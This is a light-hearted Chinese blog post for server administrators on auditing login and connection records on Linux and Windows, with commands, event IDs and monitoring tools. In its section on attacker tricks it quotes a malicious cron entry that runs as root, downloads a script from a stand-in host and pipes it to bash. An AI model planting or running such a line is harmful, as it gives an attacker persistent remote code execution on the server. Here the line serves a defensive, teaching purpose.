各位看官好啊！我是你们的老朋友，整天和服务器斗智斗勇的"服务器福尔摩斯"。今天咱们要聊的话题特别刺激——怎么查服务器上的"访客登记簿"！（搓手手）就像查你家Wi-Fi谁蹭网一样，服务器的每个连接都是有名有姓的~

一、为什么你要当个"服务器门卫"？

（推了推侦探帽）先说说查连接记录的三大理由：

1. 抓内鬼：比如发现某IP半夜三点疯狂访问（程序员加班不算啊！）

2. 防入侵：就像小区监控，看到陌生面孔要盘问

3. 搞优化：知道谁常来串门，才好准备茶水（带宽）不是？

最近我就遇到个案例：某公司服务器突然变慢，一查日志——好家伙！前员工用旧账号在巴西登录，正偷偷下载数据库呢！（友情提示：离职记得删账号啊亲）

二、Linux系统的"监控摄像头"实录

（掏出我的瑞士军刀——命令行工具）

方法1：last命令 - 查看登堂入室记录

```bash

last -i | head -10

```

这就像查看服务器的《来宾登记册》，输出结果长这样：

zhangsan pts/0 192.168.1.100 Mon May 20 09:30 - 11:15 (01:45)

root tty1 Fri May 17 18:20 - crash (2+15:30)

（看见那个crash没？这就是强行关机的犯罪现场！）

专业小贴士：

- `-i`参数显示IP地址

- 特殊用户`reboot`记录重启时间

- 可疑迹象：同一用户多个IP、非工作时间登录

方法2：/var/log/secure - 保安室的监控录像

grep "Accepted password" /var/log/secure*

这里会显示所有成功登录记录，格式像这样：

May 20 09:30:01 web01 sshd[1234]: Accepted password for zhangsan from 192.168.1.100 port 5566

（看见port 5566没？这哥们肯定改了默认SSH端口，安全意识+1分！）

方法3：netstat/lsof - 实时抓捕现行犯

sudo netstat -tulnp | grep ESTABLISHED

这个相当于在服务器门口装了个人脸识别机，实时显示谁正在屋里：

tcp6 0 0 10.0.0.1:443 203.0.113.45:63241 ESTABLISHED 1234/nginx

（发现没？443端口是HTTPS，要是看到22端口被陌生IP连接...快拉警报！）

三、Windows服务器的"锦衣卫密档"

（切换成Windows Server皮肤）

GUI派做法：

1. 【事件查看器】→ Windows日志→安全

2. 筛选事件ID：

- 4624：登录成功（约会记录）

- 4625：登录失败（被拒之门外）

- 4778：屏保解锁（摸鱼证据+1）

PowerShell侦探组：

```powershell

Get-EventLog Security -InstanceId 4624 -After (Get-Date).AddHours(-24)

这相当于用魔法水晶球回溯24小时内的登录记录~

四、高级特工专属装备

（从西装内袋掏出专业工具）

1. ELK Stack：把日志变成酷炫仪表盘

（见过用Kibana画攻击地图吗？超像FBI电影！）

2. Fail2Ban：自动封禁暴力破解IP

（想象有个机器人保安，见可疑分子就泼开水）

3. Wireshark抓包：

```bash

sudo tshark -i eth0 -Y "tcp.flags.syn==1"

```

这招能看见所有"敲门"请求（SYN包），连黑客踩点都能发现！

五、黑客常见躲猫猫招式大揭秘！

（切换到反侦察教学模式）

- 代理IP伪装：今天日本明天德国→看登录时间规律破案

- 清除日志：用`history -c`？别忘了还有syslog和auditd！

- 隐蔽后门：检测异常进程→试试`ps auxf`看进程树

上周我就逮到个用Cronjob做定时连接的，藏在`/etc/crontab`里像这样：

```

*/5 * * * * root curl http://malicious.com/update.sh | bash

（看见那个5分钟一次的外链没？典型的挖矿病毒行为！）

六、给运维新手的温馨小贴士

（突然慈祥.jpg）

1. 日志轮转很重要：别等磁盘炸了才想起`logrotate`

2. 敏感操作要审计：`sudo auditctl -w /etc/passwd -p wa`

3. 异地备份日志：黑客第一个删的就是本地日志啊！

记住我的口头禅："不记日志的运维，就像不记账的老婆——迟早要出大事！"

现在轮到你了！打开终端试试这些命令，说不定会发现惊喜（吓）呢~遇到可疑记录？欢迎在评论区晒出来，咱们一起破案！（掏出放大镜表情包）

TAG:怎么查服务器连接记录吗,怎么看服务器访问记录,如何查服务器,查看服务器是否联网,怎么查看服务器连接数,查看服务器连接